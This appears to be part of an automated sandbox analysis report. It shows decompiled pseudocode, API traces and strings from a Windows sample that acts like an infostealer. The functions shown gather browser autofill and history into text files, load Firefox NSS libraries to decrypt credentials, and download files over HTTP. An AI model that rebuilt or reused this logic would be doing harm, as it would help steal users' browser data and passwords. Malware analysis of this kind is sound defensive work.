0x004115c5
0x004115ca
0x004115d3
0x004115e0
0x004115e6
0x00411602

APIs

_memset.LIBCMT ref: 0041144F
lstrcat.KERNEL32(?,0043D12C), ref: 00411464

Part of subcall function 00417BB8: _malloc.LIBCMT ref: 00417BBE
Part of subcall function 00417BB8: GetTickCount.KERNEL32 ref: 00417BC9
Part of subcall function 00417BB8: _rand.LIBCMT ref: 00417BDE
Part of subcall function 00417BB8: wsprintfA.USER32 ref: 00417BF1

lstrcat.KERNEL32(?,00000000), ref: 0041147A
CopyFileA.KERNEL32(?,?,00000001), ref: 0041148A
_memset.LIBCMT ref: 00411499
wsprintfA.USER32 ref: 004114B9
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0041150C
HeapAlloc.KERNEL32(00000000), ref: 00411513
lstrcat.KERNEL32(?,00000000), ref: 0041154A
lstrcat.KERNEL32(?,0043F730), ref: 0041155B
lstrcat.KERNEL32(?,00000000), ref: 00411568
lstrcat.KERNEL32(?,0043D130), ref: 00411579
lstrlenA.KERNEL32(?), ref: 00411597
_memset.LIBCMT ref: 004115C5
DeleteFileA.KERNEL32(?), ref: 004115EE

Strings

ZHaZea, xrefs: 00411585
\Autofill\%s_%s.txt, xrefs: 004114B3

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$_memset$FileHeapwsprintf$AllocCopyCountDeleteProcessTick_malloc_randlstrlen
String ID: ZHaZea$\Autofill\%s_%s.txt
API String ID: 708870984-2263976030
Opcode ID: 79ff2f348e8121c80ef2c7b4bd4d4217a3220d2d8f4903404ac3d463d0f382e2
Instruction ID: 99f2271f55a71d1a1ea118712449e484d3a4c4d8cafcad52046f0967f0f93aa4
Opcode Fuzzy Hash: 79ff2f348e8121c80ef2c7b4bd4d4217a3220d2d8f4903404ac3d463d0f382e2
Instruction Fuzzy Hash: 9551507A94011CBBCB209FA0EC4DEDA7BB9FB19304F1004E5FA09E2161D7749A86CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041476C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 105
libraryloaderstringCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E0041476C(void* __ebx, void* __edx, void* __edi, void* __esi) {
				signed int _v8;
				char _v5008;
				intOrPtr _v5012;
				signed int _t13;
				intOrPtr _t15;
				void* _t16;
				struct HINSTANCE__* _t31;
				void* _t43;
				CHAR* _t45;
				signed int _t49;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;

				_t46 = __esi;
				_t44 = __edi;
				_t43 = __edx;
				_t39 = __ebx;
				E0042E350(0x1390);
				_t13 =  *0x444664; // 0xfa3a0753
				_v8 = _t13 ^ _t49;
				_t15 =  *0x447058; // 0x6e93b0
				_v5012 = _t15;
				if(_t15 == 0) {
					_t16 = 0;
				} else {
					_t45 = "PATH";
					GetEnvironmentVariableA(_t45, 0x447ff0, 0xffff);
					E0041F6B0( &_v5008, 0, 0x1388);
					 *0x4474e0( &_v5008, 0x447ff0, __edi, __esi, __ebx);
					 *0x4474e0( &_v5008, ";");
					 *0x4474e0( &_v5008, _v5012);
					SetEnvironmentVariableA(_t45,  &_v5008);
					E0041F6B0( &_v5008, 0, 0x1388);
					_t31 = LoadLibraryA( *0x447154);
					 *0x4472fc = _t31;
					if(_t31 != 0) {
						 *0x4472f0 = GetProcAddress(_t31,  *0x446cd8);
						 *0x44730c = GetProcAddress( *0x4472fc,  *0x4470b8);
						 *0x4472bc = GetProcAddress( *0x4472fc,  *0x446bd4);
						 *0x4472e4 = GetProcAddress( *0x4472fc,  *0x446b0c);
						 *0x447300 = GetProcAddress( *0x4472fc,  *0x44726c);
						 *0x4472dc = GetProcAddress( *0x4472fc,  *0x446d80);
					}
					_t55 =  *0x4472f0; // 0x0
					if(_t55 == 0) {
						L10:
						_t16 = 0;
					} else {
						_t56 =  *0x44730c; // 0x0
						if(_t56 == 0) {
							goto L10;
						} else {
							_t57 =  *0x4472bc; // 0x0
							if(_t57 == 0) {
								goto L10;
							} else {
								_t58 =  *0x447300; // 0x0
								if(_t58 == 0) {
									goto L10;
								} else {
									_t59 =  *0x4472dc; // 0x0
									if(_t59 == 0) {
										goto L10;
									} else {
										_t60 =  *0x4472e4; // 0x0
										if(_t60 == 0) {
											goto L10;
										} else {
											_t16 = 1;
										}
									}
								}
							}
						}
					}
					_pop(_t44);
					_pop(_t46);
					_pop(_t39);
				}
				_t10 =  &_v8; // 0x414a5e
				return E0041F69E(_t16, _t39,  *_t10 ^ _t49, _t43, _t44, _t46);
			}

0x0041476c
0x0041476c
0x0041476c
0x0041476c
0x00414774
0x00414779
0x00414780
0x00414783
0x00414788
0x00414790
0x004148f5
0x00414796
0x004147a4
0x004147aa
0x004147bf
0x004147cf
0x004147e1
0x004147f4
0x00414802
0x00414813
0x00414821
0x00414827
0x0041482e
0x00414847
0x0041485e
0x00414875
0x0041488c
0x004148a3
0x004148b4
0x004148b4
0x004148b9
0x004148bf
0x004148ee
0x004148ee
0x004148c1
0x004148c1
0x004148c7
0x00000000
0x004148c9
0x004148c9
0x004148cf
0x00000000
0x004148d1
0x004148d1
0x004148d7
0x00000000
0x004148d9
0x004148d9
0x004148df
0x00000000
0x004148e1
0x004148e1
0x004148e7
0x00000000
0x004148e9
0x004148eb
0x004148eb
0x004148e7
0x004148df
0x004148d7
0x004148cf
0x004148c7
0x004148f0
0x004148f1
0x004148f2
0x004148f2
0x004148f7
0x00414902

APIs

GetEnvironmentVariableA.KERNEL32(PATH,00447FF0,0000FFFF,?,00000104,006E8650,?,00414A5E,?,?,?,?,?,?), ref: 004147AA
_memset.LIBCMT ref: 004147BF
lstrcat.KERNEL32(?,00447FF0), ref: 004147CF
lstrcat.KERNEL32(?,0043F328), ref: 004147E1
lstrcat.KERNEL32(?,?), ref: 004147F4
SetEnvironmentVariableA.KERNEL32(PATH,?,?,?,00414A5E,?,?,?,?,?,?), ref: 00414802
_memset.LIBCMT ref: 00414813
LoadLibraryA.KERNEL32(?,?,?,?,?,00414A5E,?,?,?,?,?,?), ref: 00414821
GetProcAddress.KERNEL32(00000000), ref: 0041483B
GetProcAddress.KERNEL32 ref: 00414852
GetProcAddress.KERNEL32 ref: 00414869
GetProcAddress.KERNEL32 ref: 00414880
GetProcAddress.KERNEL32 ref: 00414897
GetProcAddress.KERNEL32 ref: 004148AE

Strings

PATH, xrefs: 004147A4, 004147A9, 00414801
^JA, xrefs: 004148F7

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$lstrcat$EnvironmentVariable_memset$LibraryLoad
String ID: PATH$^JA
API String ID: 3772005587-1876682321
Opcode ID: fd56f91c31b56a5891e6457bec5ec0cc95b09a52369331464fd31f18bd8ceece
Instruction ID: f24fd07dd131a41d7b5288576a95b2f4031e1f9fe0d719e685c5f86407fe0932
Opcode Fuzzy Hash: fd56f91c31b56a5891e6457bec5ec0cc95b09a52369331464fd31f18bd8ceece
Instruction Fuzzy Hash: 35415F7D909254EFCB11AF64EC088EA7BB8FB0A70470044B6F905D2231DB344A86EF9C

Uniqueness

Uniqueness Score: -1.00%

Function 0041D8B5 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 63stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,0041E404,?), ref: 0041D8B7
StrCmpCA.SHLWAPI(00000000,00440134), ref: 0041D8DF
StrCmpCA.SHLWAPI(00000000,.zip), ref: 0041D8F3
StrCmpCA.SHLWAPI(00000000,.zoo), ref: 0041D903
StrCmpCA.SHLWAPI(00000000,.arc), ref: 0041D913
StrCmpCA.SHLWAPI(00000000,.lzh), ref: 0041D923
StrCmpCA.SHLWAPI(00000000,.arj), ref: 0041D933
StrCmpCA.SHLWAPI(00000000,.gz), ref: 0041D943
StrCmpCA.SHLWAPI(00000000,.tgz), ref: 0041D953

Strings

.arc, xrefs: 0041D90D
.gz, xrefs: 0041D93D
.zoo, xrefs: 0041D8FD
.zip, xrefs: 0041D8ED
.lzh, xrefs: 0041D91D
.arj, xrefs: 0041D92D
.tgz, xrefs: 0041D94D

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
API String ID: 1659193697-51310709
Opcode ID: c590b9e57d28b4a00e5f1a50d3eb586fb4a74f721032a632ac753b40f70d1a03
Instruction ID: ef2b03d98b88c8ab020816cd187f2fc04a85a39b510093e1d31be62668859692
Opcode Fuzzy Hash: c590b9e57d28b4a00e5f1a50d3eb586fb4a74f721032a632ac753b40f70d1a03
Instruction Fuzzy Hash: 19118274F8462176EA213F35AC09BDB2754AE03B837154C26F426E5190E7BC8583969D

Uniqueness

Uniqueness Score: -1.00%

Function 0041124A Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 124stringmemoryfileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0041128A
lstrcat.KERNEL32(?), ref: 0041129F

Part of subcall function 00417BB8: _malloc.LIBCMT ref: 00417BBE
Part of subcall function 00417BB8: GetTickCount.KERNEL32 ref: 00417BC9
Part of subcall function 00417BB8: _rand.LIBCMT ref: 00417BDE
Part of subcall function 00417BB8: wsprintfA.USER32 ref: 00417BF1

lstrcat.KERNEL32(?,00000000), ref: 004112B5
CopyFileA.KERNEL32(?,?,00000001), ref: 004112C5
_memset.LIBCMT ref: 004112D4
wsprintfA.USER32 ref: 004112F4
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00411347
HeapAlloc.KERNEL32(00000000), ref: 0041134E
lstrcat.KERNEL32(?,00000000), ref: 00411372
lstrcat.KERNEL32(?,0043D130), ref: 00411383
lstrlenA.KERNEL32(?), ref: 004113A1
_memset.LIBCMT ref: 004113CF
DeleteFileA.KERNEL32(?), ref: 004113F8

Strings

ZHaZea, xrefs: 0041138F
\History\%s_%s.txt, xrefs: 004112EE

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$_memset$FileHeapwsprintf$AllocCopyCountDeleteProcessTick_malloc_randlstrlen
String ID: ZHaZea$\History\%s_%s.txt
API String ID: 708870984-3585377772
Opcode ID: 7a546f8b79278e5cfe17550b89a0e1b37f734b6a8a5623efeac9a078639d5dc3
Instruction ID: d3ba0cc0ecabb1f91bd538cd7cbcb16784f7ecbbc0c9ed485a64c4c7657331ce
Opcode Fuzzy Hash: 7a546f8b79278e5cfe17550b89a0e1b37f734b6a8a5623efeac9a078639d5dc3
Instruction Fuzzy Hash: A541317694011CABCB219FA4EC4DEDA7BBCFB19314F1004E6FA09E2161DB749A85CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040E756 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 123
networkfilesleepCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E0040E756(long __ecx, void* __edx, CHAR* _a4) {
				signed int _v8;
				void _v264;
				void _v1288;
				void* _v1292;
				long _v1296;
				struct _OVERLAPPED* _v1300;
				void* _v1304;
				struct _OVERLAPPED* _v1308;
				long _v1312;
				long _v1316;
				CHAR* _v1320;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				int _t37;
				long _t59;
				void* _t63;
				void* _t64;
				signed int _t66;

				_t63 = __edx;
				_t34 =  *0x444664; // 0xfa3a0753
				_v8 = _t34 ^ _t66;
				_t64 = 0x100;
				_t59 = __ecx;
				_v1320 = _a4;
				_v1308 = 0;
				_v1312 = 0x100;
				_t37 = InternetOpenA(0x43d12c, 1, 0, 0, 0);
				_v1304 = _t37;
				if(_t37 != 0) {
					_push("https");
					_push(E0040E6E2(__ecx, 0x100, 0));
					if( *0x447510() == 0) {
						_v1308 = 1;
					}
					_v1300 = 0;
					do {
						_push(0);
						if(_v1308 == 0) {
							_push(_t64);
						} else {
							_push(0x800100);
						}
						_v1292 = InternetOpenUrlA(_v1304, _t59, 0, 0, ??, ??);
						if(HttpQueryInfoA(_v1292, 0x13,  &_v264,  &_v1312, 0) == 0) {
							goto L10;
						} else {
							_push("200");
							_push( &_v264);
							if( *0x447510() != 0) {
								Sleep(0x3e8);
								goto L10;
							}
						}
						break;
						L10:
						_v1300 = _v1300 + 1;
					} while (_v1300 < 3);
					_t64 = CreateFileA(_v1320, 0x40000000, 3, 0, 2, 0x80, 0);
					_t59 = 0x400;
					while(InternetReadFile(_v1292,  &_v1288, _t59,  &_v1296) != 0) {
						if(_v1296 <= 0 || WriteFile(_t64,  &_v1288, _v1296,  &_v1316, 0) != 0 && _v1296 == _v1316) {
							if(_v1296 >= _t59) {
								continue;
							}
						}
						break;
					}
					E0041F6B0( &_v1288, 0, _t59);
					CloseHandle(_t64);
					InternetCloseHandle(_v1292);
					_t37 = InternetCloseHandle(_v1304);
				}
				return E0041F69E(_t37, _t59, _v8 ^ _t66, _t63, _t64, 0);
			}

0x0040e756
0x0040e75f
0x0040e766
0x0040e776
0x0040e780
0x0040e782
0x0040e788
0x0040e78e
0x0040e794
0x0040e79a
0x0040e7a2
0x0040e7a8
0x0040e7b2
0x0040e7bb
0x0040e7bd
0x0040e7bd
0x0040e7c7
0x0040e7cd
0x0040e7cd
0x0040e7d4
0x0040e7dd
0x0040e7d6
0x0040e7d6
0x0040e7d6
0x0040e7ed
0x0040e812
0x00000000
0x0040e814
0x0040e814
0x0040e81f
0x0040e828
0x0040e82f
0x00000000
0x0040e82f
0x0040e828
0x00000000
0x0040e835
0x0040e835
0x0040e83b
0x0040e860
0x0040e862
0x0040e8a7
0x0040e86f
0x0040e8a5
0x00000000
0x00000000
0x0040e8a5
0x00000000
0x0040e86f
0x0040e8cf
0x0040e8d8
0x0040e8e4
0x0040e8f0
0x0040e8f0
0x0040e904

APIs

InternetOpenA.WININET(0043D12C,00000001,00000000,00000000,00000000), ref: 0040E794

Part of subcall function 0040E6E2: _memset.LIBCMT ref: 0040E6FD
Part of subcall function 0040E6E2: _memset.LIBCMT ref: 0040E70A
Part of subcall function 0040E6E2: lstrlenA.KERNEL32(00000000,10000000,?), ref: 0040E730
Part of subcall function 0040E6E2: InternetCrackUrlA.WININET(00000000,00000000), ref: 0040E738

StrCmpCA.SHLWAPI(00000000,https), ref: 0040E7B3
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,00000100,00000000), ref: 0040E7E7
HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 0040E80A
StrCmpCA.SHLWAPI(?,200), ref: 0040E820
Sleep.KERNEL32(000003E8), ref: 0040E82F
CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 0040E85A
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040E887
InternetReadFile.WININET(?,?,00000400,?), ref: 0040E8BC
_memset.LIBCMT ref: 0040E8CF
CloseHandle.KERNEL32(00000000), ref: 0040E8D8
InternetCloseHandle.WININET(?), ref: 0040E8E4
InternetCloseHandle.WININET(?), ref: 0040E8F0

Strings

https, xrefs: 0040E7A8
200, xrefs: 0040E814

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle_memset$Open$CrackCreateHttpInfoQueryReadSleepWritelstrlen
String ID: 200$https
API String ID: 1246493084-2945048398
Opcode ID: 251e5b199ebd7cf94ca4ad899129577cedbd15a5f0c4419e294708e3580d7e3f
Instruction ID: 27ef5dc9d2a88a061d04db91855efd22c51dfdbaff1a3dfbf1f8a859e2eeeaa2
Opcode Fuzzy Hash: 251e5b199ebd7cf94ca4ad899129577cedbd15a5f0c4419e294708e3580d7e3f
Instruction Fuzzy Hash: 24412975900628ABDB209F22DC48BEF7B78EB06756F0048B6B509E2190D7744A95DFA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041D9EC Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 170
fileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0041D9EC(void* __ecx, signed int __edx, signed short* _a4, long* _a8, signed int* _a12) {
				signed int _v8;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v52;
				struct _BY_HANDLE_FILE_INFORMATION _v60;
				signed short _v64;
				void _v68;
				long _v72;
				long _v76;
				void _v80;
				long* _v84;
				signed int* _v88;
				signed short* _v92;
				void _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t75;
				signed int _t85;
				long _t86;
				signed short* _t87;
				long* _t88;
				void* _t89;
				long _t107;
				void _t112;
				signed int* _t113;
				signed char _t115;
				signed int _t124;
				signed int _t127;

				_t124 = __edx;
				_t75 =  *0x444664; // 0xfa3a0753
				_v8 = _t75 ^ _t127;
				_v92 = _a4;
				_v84 = _a8;
				_v88 = _a12;
				_t126 = __ecx;
				_t113 = __edx;
				if(GetFileInformationByHandle(__ecx,  &_v60) != 0) {
					_t115 = _v60.dwFileAttributes;
					_t125 = 0;
					_v68 = _t115;
					_t11 =  &_v68;
					 *_t11 = _v68 & 1;
					_v64 = 0;
					if( *_t11 != 0) {
						_v64 = 1;
					}
					if((_t115 & 0x00000002) != 0) {
						_v64 = _v64 | 0x00000002;
					}
					if((_t115 & 0x00000004) != 0) {
						_v64 = _v64 | 0x00000004;
					}
					_t85 = _t115 & 0x00000010;
					if(_t85 != 0) {
						_v64 = _v64 | 0x00000010;
					}
					if((_t115 & 0x00000020) != 0) {
						_v64 = _v64 | 0x00000020;
					}
					if(_t85 == _t125) {
						_v64 = _v64 | 0x80000000;
					} else {
						_v64 = _v64 | 0x40000000;
					}
					_v64 = _v64 | 0x01000000;
					if(_v68 == _t125) {
						_v64 = _v64 | 0x00800000;
					}
					_t86 = GetFileSize(_t126, _t125);
					_v76 = _t86;
					if(_t86 > 0x28) {
						SetFilePointer(_t126, _t125, _t125, _t125);
						ReadFile(_t126,  &_v68, 2,  &_v72, _t125);
						SetFilePointer(_t126, 0x24, _t125, _t125);
						ReadFile(_t126,  &_v80, 4,  &_v72, _t125);
						if(_v68 == 0x54ad) {
							_t107 = _v80;
							if(_v76 > _t107 + 0x34) {
								SetFilePointer(_t126, _t107, _t125, _t125);
								ReadFile(_t126,  &_v96, 4,  &_v72, _t125);
								_t112 = _v96;
								if(_t112 == 0x5a4d || _t112 == 0x454e || _t112 == 0x454c || _t112 == 0x4550) {
									_v64 = _v64 | 0x00400000;
								}
							}
						}
					}
					_t87 = _v92;
					if(_t87 != _t125) {
						 *_t87 = _v64;
					}
					_t88 = _v84;
					if(_t88 != _t125) {
						 *_t88 = _v76;
					}
					if(_t113 != _t125) {
						 *_t113 = E0041D961(_v60.ftLastAccessTime, _v44);
						_t113[1] = _t124;
						_t113[2] = E0041D961(_v60.ftLastWriteTime, _v36);
						_t113[3] = _t124;
						_t113[4] = E0041D961(_v60.ftCreationTime, _v52);
						_t113[5] = _t124;
					}
					_t113 = _v88;
					if(_t113 != _t125) {
						_push(_v36);
						_t125 =  &_v64;
						_t126 =  &_v68;
						E0041D985( &_v64,  &_v68, _v60.ftLastWriteTime);
						 *_t113 = (_v68 & 0x0000ffff) << 0x00000010 | _v64 & 0x0000ffff;
					}
					_t89 = 0;
					goto L34;
				} else {
					_t89 = 0x200;
					L34:
					return E0041F69E(_t89, _t113, _v8 ^ _t127, _t124, _t125, _t126);
				}
			}

0x0041d9ec
0x0041d9f2
0x0041d9f9
0x0041d9ff
0x0041da07
0x0041da0e
0x0041da14
0x0041da18
0x0041da22
0x0041da2e
0x0041da33
0x0041da36
0x0041da39
0x0041da39
0x0041da3c
0x0041da3f
0x0041da41
0x0041da41
0x0041da47
0x0041da49
0x0041da49
0x0041da50
0x0041da52
0x0041da52
0x0041da58
0x0041da5b
0x0041da5d
0x0041da5d
0x0041da64
0x0041da66
0x0041da66
0x0041da6c
0x0041da77
0x0041da6e
0x0041da6e
0x0041da6e
0x0041da7e
0x0041da88
0x0041da8a
0x0041da8a
0x0041da93
0x0041da99
0x0041da9f
0x0041daa9
0x0041dabb
0x0041dac6
0x0041dad8
0x0041dae7
0x0041dae9
0x0041daf2
0x0041daf8
0x0041db0a
0x0041db10
0x0041db18
0x0041db2f
0x0041db2f
0x0041db18
0x0041daf2
0x0041dae7
0x0041db36
0x0041db3b
0x0041db40
0x0041db40
0x0041db42
0x0041db47
0x0041db4c
0x0041db4c
0x0041db50
0x0041db60
0x0041db65
0x0041db70
0x0041db76
0x0041db81
0x0041db84
0x0041db84
0x0041db87
0x0041db8c
0x0041db8e
0x0041db91
0x0041db97
0x0041db9a
0x0041dbae
0x0041dbae
0x0041dbb0
0x00000000
0x0041da24
0x0041da24
0x0041dbb2
0x0041dbc0
0x0041dbc0

APIs

GetFileInformationByHandle.KERNEL32(?,?,00000000,?,?), ref: 0041DA1A
GetFileSize.KERNEL32(?,00000000), ref: 0041DA93
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0041DAA9
ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 0041DABB
SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 0041DAC6
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041DAD8
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0041DAF8
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041DB0A

Strings

, xrefs: 0041DA66

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: File$PointerRead$HandleInformationSize
String ID:
API String ID: 2979504256-3916222277
Opcode ID: 5e42e1e6832be18356642968a865d2ffa3f50eb1d12bf3c146dbb98213e00eb0
Instruction ID: 6781c11060c6a6d9a234697d923e1d35fa259ac8ab9342c215cc287f26ac3e2e
Opcode Fuzzy Hash: 5e42e1e6832be18356642968a865d2ffa3f50eb1d12bf3c146dbb98213e00eb0
Instruction Fuzzy Hash: 37513CB1D04218AFDB25CF95DC85AEEBBB5FF49700F14402AF502E6261D7389985CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040C251 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040C251(void* __ebx, void* __edx, intOrPtr* __edi, char* __esi, void* __eflags) {
				intOrPtr* _t46;
				intOrPtr* _t50;
				intOrPtr* _t54;
				intOrPtr* _t58;
				intOrPtr* _t62;
				intOrPtr* _t66;
				void* _t123;

				_t117 = __esi;
				_t105 = __edi;
				_push(0x3c);
				E00423679(E004344C2, __ebx, __edi, __esi);
				E004049CF(_t123 - 0x48,  *0x447058);
				 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
				_t125 =  *0x4476b4;
				if( *0x4476b4 == 0) {
					_t118 = "vcruntime140.dll";
					_push("vcruntime140.dll");
					_push(_t123 - 0x2c);
					_t46 = E0040CEE5(1, _t123 - 0x48, _t118, _t125);
					 *(_t123 - 4) = 1;
					_t126 =  *((intOrPtr*)(_t46 + 0x14)) - 0x10;
					if( *((intOrPtr*)(_t46 + 0x14)) >= 0x10) {
						_t46 =  *_t46;
					}
					E0040B7F8(1, _t118, _t46, 1);
					 *(_t123 - 4) = 0;
					E00404A66(_t123 - 0x2c, 1, 0);
					_t119 = "softokn3.dll";
					_push("softokn3.dll");
					_push(_t123 - 0x2c);
					_t50 = E0040CEE5(1, _t123 - 0x48, _t119, _t126);
					 *(_t123 - 4) = 2;
					_t127 =  *((intOrPtr*)(_t50 + 0x14)) - 0x10;
					if( *((intOrPtr*)(_t50 + 0x14)) >= 0x10) {
						_t50 =  *_t50;
					}
					E0040B7F8(1, _t119, _t50, 1);
					 *(_t123 - 4) = 0;
					E00404A66(_t123 - 0x2c, 1, 0);
					_t120 = "nss3.dll";
					_push("nss3.dll");
					_push(_t123 - 0x2c);
					_t54 = E0040CEE5(1, _t123 - 0x48, _t120, _t127);
					 *(_t123 - 4) = 3;
					_t128 =  *((intOrPtr*)(_t54 + 0x14)) - 0x10;
					if( *((intOrPtr*)(_t54 + 0x14)) >= 0x10) {
						_t54 =  *_t54;
					}
					E0040B7F8(1, _t120, _t54, 1);
					 *(_t123 - 4) = 0;
					E00404A66(_t123 - 0x2c, 1, 0);
					_t121 = "msvcp140.dll";
					_push("msvcp140.dll");
					_push(_t123 - 0x2c);
					_t58 = E0040CEE5(1, _t123 - 0x48, _t121, _t128);
					 *(_t123 - 4) = 4;
					_t129 =  *((intOrPtr*)(_t58 + 0x14)) - 0x10;
					if( *((intOrPtr*)(_t58 + 0x14)) >= 0x10) {
						_t58 =  *_t58;
					}
					E0040B7F8(1, _t121, _t58, 1);
					 *(_t123 - 4) = 0;
					E00404A66(_t123 - 0x2c, 1, 0);
					_t122 = "mozglue.dll";
					_push("mozglue.dll");
					_push(_t123 - 0x2c);
					_t62 = E0040CEE5(1, _t123 - 0x48, _t122, _t129);
					 *(_t123 - 4) = 5;
					_t130 =  *((intOrPtr*)(_t62 + 0x14)) - 0x10;
					if( *((intOrPtr*)(_t62 + 0x14)) >= 0x10) {
						_t62 =  *_t62;
					}
					E0040B7F8(1, _t122, _t62, 1);
					 *(_t123 - 4) = 0;
					E00404A66(_t123 - 0x2c, 1, 0);
					_t117 = "freebl3.dll";
					_push("freebl3.dll");
					_push(_t123 - 0x2c);
					_t66 = E0040CEE5(1, _t123 - 0x48, _t117, _t130);
					 *(_t123 - 4) = 6;
					if( *((intOrPtr*)(_t66 + 0x14)) >= 0x10) {
						_t66 =  *_t66;
					}
					_t105 = _t66;
					E0040B7F8(1, _t117, _t66, 1);
					E00404A66(_t123 - 0x2c, 1, 0);
					 *0x4476b4 = 1;
				}
				E00404A66(_t123 - 0x48, 1, 0);
				return E004236C3(1, _t105, _t117);
			}

0x0040c251
0x0040c251
0x0040c251
0x0040c258
0x0040c266
0x0040c26b
0x0040c272
0x0040c279
0x0040c27f
0x0040c287
0x0040c288
0x0040c28c
0x0040c293
0x0040c296
0x0040c29a
0x0040c29c
0x0040c29c
0x0040c2a3
0x0040c2af
0x0040c2b3
0x0040c2b8
0x0040c2c0
0x0040c2c1
0x0040c2c5
0x0040c2cc
0x0040c2d0
0x0040c2d4
0x0040c2d6
0x0040c2d6
0x0040c2dd
0x0040c2e9
0x0040c2ed
0x0040c2f2
0x0040c2fa
0x0040c2fb
0x0040c2ff
0x0040c306
0x0040c30a
0x0040c30e
0x0040c310
0x0040c310
0x0040c317
0x0040c323
0x0040c327
0x0040c32c
0x0040c334
0x0040c335
0x0040c339
0x0040c340
0x0040c344
0x0040c348
0x0040c34a
0x0040c34a
0x0040c351
0x0040c35d
0x0040c361
0x0040c366
0x0040c36e
0x0040c36f
0x0040c373
0x0040c37a
0x0040c37e
0x0040c382
0x0040c384
0x0040c384
0x0040c38b
0x0040c397
0x0040c39b
0x0040c3a0
0x0040c3a8
0x0040c3a9
0x0040c3ad
0x0040c3b4
0x0040c3bc
0x0040c3be
0x0040c3be
0x0040c3c1
0x0040c3c5
0x0040c3d1
0x0040c3d6
0x0040c3d6
0x0040c3e2
0x0040c3ec

APIs

__EH_prolog3_GS.LIBCMT ref: 0040C258

Part of subcall function 004049CF: _strlen.LIBCMT ref: 004049E6

Part of subcall function 0040CEE5: __EH_prolog3.LIBCMT ref: 0040CEEC
Part of subcall function 0040CEE5: _strlen.LIBCMT ref: 0040CF18
Part of subcall function 0040CEE5: _strlen.LIBCMT ref: 0040CF35

Strings

vcruntime140.dll, xrefs: 0040C27F, 0040C287
nss3.dll, xrefs: 0040C2F2, 0040C2FA
freebl3.dll, xrefs: 0040C3A0, 0040C3A8
msvcp140.dll, xrefs: 0040C32C, 0040C334
mozglue.dll, xrefs: 0040C366, 0040C36E
softokn3.dll, xrefs: 0040C2B8, 0040C2C0

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: _strlen$H_prolog3H_prolog3_
String ID: freebl3.dll$mozglue.dll$msvcp140.dll$nss3.dll$softokn3.dll$vcruntime140.dll
